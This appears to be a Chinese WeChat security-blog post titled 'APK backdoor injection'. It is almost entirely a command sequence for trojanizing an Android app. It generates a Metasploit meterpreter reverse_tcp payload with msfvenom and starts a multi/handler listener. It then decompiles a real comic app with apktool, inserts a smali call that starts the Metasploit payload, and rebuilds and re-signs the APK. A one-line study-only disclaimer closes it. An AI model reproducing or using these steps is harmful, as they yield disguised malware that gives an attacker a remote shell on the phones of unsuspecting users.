https://ibotpeaches.github.io/Apktool/install/
https://www.oracle.com/java/technologies/javase-jdk16-downloads.html
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6663 -o 1.apk
msf6 > use exploit/multi/handler
Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 6663
LPORT => 6663
msf6 exploit(multi/handler) > exploit -z -j
java -jar apktool.jar d 1.apk
java -jar apktool.jar d kemi.apk
/root/APP/kemi/smali/com/icomico/comi/activity/
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
java -jar apktool.jar b kemi
生成签名
keytool -genkey -v -keystore android.keystore -alias android.keystore -keyalg RSA -validity 20000
添加签名
bin/jarsigner -verbose -keystore android.keystore -signedjar 123_yqm.apk kemi.apk android.keystore
本篇文章仅供学习使用,切勿触犯法律!
END
本文始发于微信公众号(NOVASEC):Apk注入后门
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论